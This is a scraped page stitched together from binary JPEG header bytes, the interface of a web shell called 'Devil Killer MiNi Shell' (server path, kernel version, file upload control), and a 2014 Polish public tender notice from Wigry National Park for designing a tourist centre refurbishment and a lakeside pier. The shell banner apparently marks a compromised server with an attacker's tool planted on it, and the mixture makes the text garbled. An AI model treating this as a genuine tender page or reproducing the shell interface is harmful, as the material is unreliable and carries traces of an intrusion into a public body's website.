JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140221/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140221/35089-N-2014.html

<p class="kh_header"><b>Suwałki: Opracowanie dokumentacji projektowej na
Modernizację Centrum Informacji Turystycznej CIT
Budowę pomostu przy Muzeum Wigier w Starym Folwarku</b><br>
<b>Numer ogłoszenia: 35089 - 2014; data zamieszczenia: 21.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wigierski Park Narodowy , Krzywe 82, 16-400 Suwałki, woj. podlaskie, tel. 87 5666322, faks 87 5632541.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wigry.win.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ochrona Środowiska.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na
Modernizację Centrum Informacji Turystycznej CIT
Budowę pomostu przy Muzeum Wigier w Starym Folwarku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Modernizacja Centrum Informacji Turystycznej w Krzywem. 
Planowany zakres prac do zaprojektowania
Remont pomieszczenia CIT 
Remont posadzek-wymiana nawierzchni
Usunięcie glazury ze ścian, naprawa tynków i ich wymalowanie oraz wykonanie elementów ozdobnych i zabezpieczających ściany przed zabrudzeniem np. żywiczny tynk mozaikowy, wg. projektu aranżacji wnętrza.
Wymiana i dostosowanie wnętrzowej instalacji elektrycznej i tele-informatycznej celem ukrycia kabli i dostosowania do nowych funkcji pomieszczenia. Wymiana opraw oświetlenia wewnętrznego - zgodnie z projektem aranżacji wnętrza.
Wyburzenie murowanego wiatrołapu wewnątrz budynku i wykonanie nowego na zewnątrz w postaci przeszklonej konstrukcji aluminiowo-szklanej z instalacją elektryczną i podświetlanym kasetonem na ścianie frontowej.
Poszerzenie otworu drzwiowego w przejściu pomiędzy CIT a salą ekspozycyjną w celu umożliwienia przejazdu standardowego wózka inwalidzkiego.
Zaprojektowanie elementów wyposażenia wnętrza biurka, krzesła, regały, lada do obsługi turystów itp. z uwzględnieniem wytycznych projektu aranżacji wnętrza. Podstawowym materiałem z którego należy zaprojektować elementy wyposażenia jest drewno. Dopuszcza się łączenie drewna z innymi materiałami np. szkło, aluminium, stal nierdzewna, po uzyskaniu pisemnej akceptacji zamawiającego.
Wyznaczenie miejsca i wykonanie podejść umożliwiających sezonowe ustawienie automatu do dystrybucji napojów zimnych, gorących i  słodyczy. 
Remont magazynu rowerów w tym: szpachlowanie i malowanie tynków ścian i sufitu, lamperia z  tynku mozaikowego, wykonanie okładziny podłogowej z płytek gress.
Przebudowa instalacji elektrycznej celem dostosowania do potrzeb składowania i serwisowania rowerów.
Zaprojektowanie wyposażenia magazynku rowerowego w tym: stół warsztatowy z podstawowym osprzętem do bieżących napraw i  serwisowania rowerów, stojaki wieszaki na rowery, zapas części zamiennych dobór w porozumieniu z pracownikiem WPN
Wymiana sanitariatu kontenerowego w Krzywem	
Zaprojektowanie kontenera sanitarnego i podłączenia go do mediów woda, kanalizacja, instalacja elektryczna) nowego kontenera WC o konstrukcji stalowej z dachem dwu lub cztero spadowym pokrytym blachą powlekaną. Ściany z izolacją cieplną np. płyta warstwowa, z zewnątrz blacha wewnątrz trwałe i łatwe w utrzymaniu czystości tworzywo. W miejscu posadowienia kontenera istnieje dedykowane przyłącze wodociągowe i rurociąg do odprowadzenia ścieków, konieczne do zaprojektowania jest przyłącze energetyczne przyłącze zalicznikowe, nie wymaga uzgodnień z ZE.
Kontener musi być wyposażony minimum w:
dwie kabiny WC w tym jedna przystosowana do potrzeb osób niepełnosprawnych
elektryczną instalację oświetleniową i gniazd wtykowych  
ogrzewanie elektryczne umożliwiające korzystanie z urządzenia do temperatury 0 st C
elektryczny podgrzewacz c.w.u. oraz kolektor słoneczny z zasobnikiem wyposażonym w wężownicę wymiennik płytowy lub baterię fotowoltaiczną wraz z zasobnikiem z grzałką.
Wszelkie instalacje wodne należy zaprojektować w taki sposób aby możliwy było łatwe ich osuszenie i demontaż na okres zimy np. za pomocą szybkozłączy
Zakres opracowań projektowych:
Uzyskanie niezbędnych materiałów do projektowania w tym: mapy do celów projektowych i badań geotechnicznych gruntu.
Opracowanie projektu aranżacji wnętrza pomieszczenia CIT zawierającego dobór ozdobnych elementów graficznych ścian. Zastosowane elementy graficzne muszą być  związane z WPN i jego działalnością. Projekt oświetlenia z podziałem na dwie strefy funkcjonalne tj. biurową i obsługi turystów. Dobór mebli i wyposażenia w środki audiowizualne do przestrzeni biurowej i strefy obsługi turystów.  
Sporządzenie wielobranżowego wszystkie branże projektu budowlanego i wykonawczego wraz z wszelkimi dodatkowymi  opracowaniami, decyzjami o warunkach zabudowy i  środowiskowych w tym związanych z obszarem Natura 2000 i uzgodnieniami niezbędnymi do uzyskania pozwolenia na budowę i wykonania robót budowlanych wraz z  uzyskaniem pozwolenia na budowę. Zakres i forma projektu budowlanego muszą być zgodne z wymaganiami rozporządzenia Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. z późniejszymi zmianami Dz.U. 2012 nr 0 poz. 462 ze zm. projekt budowlany i wykonawczy, specyfikacje techniczne wykonania i odbioru robót oraz przedmiary muszą być sporządzone zgodnie z wymaganiami wynikającymi z rozporządzenia Min. Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego Dz. U. Nr 202, poz. 2072 5 egz. w wersji graficznej oraz 1 kpl. w wersji elektronicznej na płycie CD lub innym nośniku elektronicznym w formacie PDF lub jpg.
Opracowanie wytycznych do planu BIOZ,
Sporządzenie kosztorysu inwestorskiego 1 egzemplarz w formie graficznej i na płycie CD DVD w formacie edytowalnym ath i przedmiarów robót w formie elektronicznej na płycie CD DVD w formacie edytowalnym ath oraz xls - edytowalnym pliku arkusza kalkulacyjnego. Kosztorys inwestorski musi być sporządzony zgodnie z rozporządzeniem Min. Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym Dz. U. Nr 130, poz. 1389.
Sporządzenie specyfikacji technicznych wykonania i odbioru robót budowlanych w
rozbiciu na szczegółowe specyfikacje techniczne zgodnie z wymogami ustawy prawo
zamówień publicznych, 1 egz.wersji graficznej oraz 1 kpl. w wersji elektronicznej na płycie CD w formacie PDF,
Ze względu na treść art. 29 pkt 3 ustawy Prawo Zamówień Publicznych w żadnym z elementów opracowanej dokumentacji nie mogą znaleźć się nazwy własne lub wskazanie producentów konkretnych produktów, urządzeń itp. W przypadku gdy będzie to niemożliwe wykonawca projektu szczegółowo opisze parametry jakie spełniać muszą produkty urządzenia równoważne. 
Wykonawca w opracowaniu projektowym opisze przedmiot zamówienia za pomocą cech technicznych i jakościowych, z zachowaniem Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy.
W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych
państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy
uwzględnia się w kolejności
europejskie aprobaty techniczne;
wspólne specyfikacje techniczne;
normy międzynarodowe;
inne techniczne systemy odniesienia ustanowione przez europejskie organy normalizacyjne.
W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych
państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy oraz aprobat, specyfikacji, norm i systemów, o których mowa wyżej, uwzględnia się w kolejności:
Polskie Normy;
polskie aprobaty techniczne;
polskie specyfikacje techniczne.
Opisując przedmiot zamówienia za pomocą norm, aprobat, specyfikacji technicznych i
systemów odniesienia, o których mowa wyżej, wykonawca jest obowiązany wskazać, że dopuszcza rozwiązania równoważne opisywanym i szczegółowo określić parametry, według których równoważność ta będzie oceniana.
Wymagania dodatkowe  
Projektant zobowiązuje się do sprawowania nadzoru autorskiego nad realizacją projektu.
Opracowana dokumentacja powinna zawierać oświadczenie, że jest wykonana zgodnie z obowiązującymi przepisami w zakresie projektowania i przepisami szczegółowymi    
Opracowaną dokumentację wraz z kompletem uzgodnień i pozwoleniami na budowę Wykonawca dostarczy do siedziby Zamawiającego,
Wykonawca sceduje na Zamawiającego wszelkie majątkowe prawa autorskie do projektu. 
Budowa pomostu przy Muzeum Wigier w Starym Folwarku
Założenia do projektowania:
Rozbiórka istniejącego pomostu drewnianego o wymiarach 38 x 3,5 m
Zaprojektowanie  nowego pomostu w kształcie litery L o wymiarach : części prostopadłej do brzegu 40, 0 m x 5, 0 m i ramienia równoległego do brzegu  15,0 m x 3,0 m. Wysokość pokładu pomostu nad lustrem wody około 70 cm przy średniej wysokości lustra wody.
Pale nośne pomostów zaprojektować jako stalowe grubościenne rury wypełnione betonem.
Konstrukcja nośna - legary i kleszcze z drewna dębowego
Pokład z bali drewnianych sosna Na całej długości części ogólnodostępnej- od strony miejsca wykorzystywanego do kąpieli zaprojektować obniżenie pokładu ułatwiające wychodzenie z wody. 
Pokład pomostu w części prostopadłej do brzegu podzielony drewnianą barierą na dwie strefy funkcjonalne - kąpielisko i plażowanie o szerokości 3 m oraz obsługa jednostek pływających o szerokości 2 m.
Pokład i balustrady zaprojektować z drewna iglastego impregnowanego metodą próżniowo-ciśnieniową i następnie barwionego olejowym środkiem impregnacyjno dekoracyjnym.
W części równoległej do brzegu zaprojektować miejsce do cumowania statku pasażerskiego Leptodora  2 , z możliwością wchodzenia i schodzenia z pokładu statku. 
W części przylegającej do pomostu po stronie przeznaczonej do cumowania łodzi zaprojektować oczyszczenie dna jeziora z trzciny i mułu. Jeżeli w wyniku pomiarów okaże się to konieczne należy przewidzieć pogłębienie dna jeziora w strefie przybrzeżnej celem udostępnienia do cumowania całej długości pomostu. 
Zakres opracowań projektowych:
Pozyskanie map geodezyjnych do celów projektowych
Wykonanie badań geotechnicznych gruntu
Opracowanie dokumentacji niezbędnej do uzyskania nowej lub niezbędnej zmiany posiadanej przez zamawiającego decyzji o warunkach zabudowy
 Opracowanie dokumentacji niezbędnej do uzyskania  wszelkich decyzji w tym środowiskowych wymaganych przez instytucje opiniujące zamiar realizacji inwestycji.   
Opracowanie operatu wodnoprawnego 5 egz. w wersji graficznej oraz 1 kpl. w wersji elektronicznej na płycie CD lub innym nośniku elektronicznym w formacie PDF lub jpg. i uzyskanie pozwolenia wodnoprawnego.
Opracowanie kompletnej, zawierającej wszelkie wymagane prawem decyzje i uzgodnienia, dokumentacji projektowej projekt budowlany i wykonawczy niezbędnej do uzyskania pozwolenia na budowę i wykonania robót budowlanych. 5 egz. w wersji graficznej oraz 1 kpl. w wersji elektronicznej na płycie CD lub innym nośniku elektronicznym w formacie PDF lub jpg.
Sporządzenie specyfikacji technicznych wykonania i odbioru robót budowlanych w
rozbiciu na szczegółowe specyfikacje techniczne zgodnie z wymogami ustawy prawo
zamówień publicznych, 1 egz.wersji graficznej oraz 1 kpl. w wersji elektronicznej na    płycie CD w formacie PDF,
Sporządzenie kosztorysu inwestorskiego 1 egzemplarz w formie graficznej i na płycie CDDVD w formacie edytowalnym ath i przedmiarów robót w formie elektronicznej na płycie CDDVD w formacie edytowalnym ath oraz xls  edytowalnym pliku arkusza kalkulacyjnego. Kosztorys inwestorski musi być sporządzony zgodnie z rozporządzeniem Min. Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym Dz. U. Nr 130, poz. 1389.
Ze względu na treść art. 29 pkt 3 ustawy Prawo Zamówień Publicznych w żadnym z elementów opracowanej dokumentacji nie mogą znaleźć się nazwy własne lub wskazanie producentów konkretnych produktów, urządzeń itp. W przypadku gdy będzie to niemożliwe wykonawca projektu szczegółowo opisze parametry jakie spełniać muszą produkty urządzenia równoważne. 
 Wykonawca w opracowaniu projektowym opisze przedmiot zamówienia za pomocą cech technicznych i jakościowych, z zachowaniem Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy.
W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych
państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy
uwzględnia się w kolejności:
europejskie aprobaty techniczne;
wspólne specyfikacje techniczne;
normy międzynarodowe;
inne techniczne systemy odniesienia ustanowione przez europejskie organy normalizacyjne.
W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych
państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy oraz aprobat, specyfikacji, norm i systemów, o których mowa wyżej, uwzględnia się w kolejności:
Polskie Normy;
polskie aprobaty techniczne;
polskie specyfikacje techniczne.
Opisując przedmiot zamówienia za pomocą norm, aprobat, specyfikacji technicznych i
systemów odniesienia, o których mowa wyżej, wykonawca jest obowiązany wskazać, że dopuszcza rozwiązania równoważne opisywanym i szczegółowo określić parametry, według których równoważność ta będzie oceniana.
Wymagania dodatkowe  
Projektant zobowiązuje się do sprawowania nadzoru autorskiego nad realizacją projektu.
Opracowana dokumentacja powinna zawierać oświadczenie, że jest wykonana zgodnie z obowiązującymi przepisami w zakresie projektowania i przepisami szczegółowymi    
Opracowaną dokumentację wraz z kompletem uzgodnień i pozwoleniami na budowę Wykonawca dostarczy do siedziby Zamawiającego,
Wykonawca sceduje na Zamawiającego wszelkie majątkowe prawa autorskie do projektu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określono</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu udokumentowania spełniania warunku wymienionego w art. 22 ust. 1 pkt. 2   PZP tj.  posiadania wiedzy i doświadczenia, zamawiający żąda aby Wykonawca  w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie zrealizował,
 Dla części 1 zamówienia Minimum dwa opracowania polegające na sporządzeniu dokumentacji projektowej projekt budowlany i wykonawczy budowy modernizacji budynku lub jego części, w której znajdowały się wydzielone pomieszczenia pełniące funkcje recepcyjne lub wystawowe.
Dla części 2 zamówienia Minimum dwa opracowania polegające na sporządzeniu dokumentacji projektowej projekt budowlany i wykonawczy budowy mostów, pomostów o powierzchni pokładu nie mniejszej niż 100 m2 każdy opartych na palach wbitych w podłoże. Zamawiający nie uzna za spełnienie niniejszego warunku projektu pomostów pływających zakotwionych za pomocą systemowych rur czy pali kotwiących.
W przypadku składania oferty na całość zamówienia wykonawca powinien udokumentować łączne spełnianie warunków wymienionych w pkt. 8.1.1 oraz pkt. 8.1.2. SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określono</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu udokumentowania spełniania warunku wymienionego w art. 22 ust. 1 pkt. 3  PZP tj. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia zamawiający wymaga aby wykonawca dysponował:
Dla części 1 zamówienia
Minimum jedną osobą z uprawnieniami do projektowania  w każdej z niżej wymienionych specjalności:
Konstrukcyjno budowlanej,
Instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych  
Minimum jedną osobą legitymującą się dyplomem ukończenia wyższej uczelni na kierunku architektura lub aranżacja wnętrz. 
Zamawiający wymaga aby wykonawca wskazał w ofercie osobę, która będzie koordynowała realizację zadania.
Zamawiający dopuszcza łączenie uprawnień i wykształcenia przez jedną osobę. Wykonawca dla spełnienia wymogów określonych w pkt.8.2.1.1 oraz 8.2.1.2 SIWZ może wedle swego wyboru wykazać 1,2 lub 3 osoby. 
 Dla części 2 zamówienia Minimum jedną osobą z uprawnieniami do projektowania  w specjalności konstrukcyjno-budowlanej lub uprawnieniami wydanymi na podstawie wcześniej obowiązujących przepisów, do projektowania w zakresie budowli hydrotechnicznych
W przypadku składania oferty na obie części zamówienia wykonawca powinien udokumentować łączne spełnianie warunków wymienionych w pkt.8.2.1 i 8.2.2 SIWZ,w przypadku osoby posiadającej uprawnienia konstrukcyjno budowlane dopuszcza się wskazanie tej samej osoby do realizacji zamówienia w obu częściach.
W przypadku wykonawców zagranicznych, Zamawiający uzna analogiczne uprawnienia wydane w kraju, w którym dany Wykonawca ma miejsce zamieszkania lub siedzibę</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określono</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku składania oferty wspólnej przez kilka podmiotów np. konsorcja w ofercie należy wskazać lidera lub reprezentanta grupy upoważnionego do kontaktów z zamawiającym i dołączyć oryginał upoważnienia/pełnomocnictwa podpisany przez upoważnionych reprezentantów firm składających ofertę wspólną.
Wykonawcy zobowiązani są do przedłożenia  w oryginale oświadczeń o spełnianiu warunków art. 22 ust. 1, listy kapitałowej informacji o nie przynależności do grupy kapitałowej, pełnomocnictw oraz zobowiązań podmiotów do oddania zasobów do dyspozycji 
Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda dołączenia do oferty dokumentów określających:
